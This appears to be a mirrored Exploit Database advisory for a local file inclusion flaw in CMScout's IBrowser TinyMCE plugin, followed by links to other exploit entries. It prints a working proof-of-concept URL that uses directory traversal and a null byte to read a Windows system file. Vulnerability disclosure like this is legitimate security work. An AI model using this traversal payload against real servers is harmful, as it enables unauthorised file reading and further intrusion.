CMScout IBrowser TinyMCE Plugin 2.3.4.3 – Local File Inclusion

Exploit Database
19 阅读

作者： John Leitch

日期： 2010-09-15
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/34639/

source: https://www.securityfocus.com/bid/43260/info

CMScout is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability using directory-traversal strings to view files and execute local scripts in the context of the webserver process. This may aid in further attacks.

CMScout 2.09 is vulnerable; other versions may also be affected.

http://www.example.com/cmscout/tiny_mce/plugins/ibrowser/ibrowser.php?lang=../../../../../../../../windows/win.ini%00

last Exploits
CMScout IBrowser TinyMCE Plugin 2.3.4.3 – Local File Inclusion的更多信息

Solare Datensysteme Solar-Log Devices 2.8.4-56/3.5.2-85 – Multiple Vulnerabilities：
TP-Link C50 Wireless Router 3 – Cross-Site Request Forgery (Remote Reboot)：
WeBid 1.0.6 – SQL Injection：
Chamilo LMS – Persistent Cross-Site Scripting：
Joomla! Component com_jajobboard – Multiple Local File Inclusions：
perfexcrm 1.10 – ‘State’ Stored Cross-site scripting (XSS)：
Webmin 1.996 – Remote Code Execution (RCE) (Authenticated)：
Coaster CMS 5.5.0 – Cross-Site Scripting：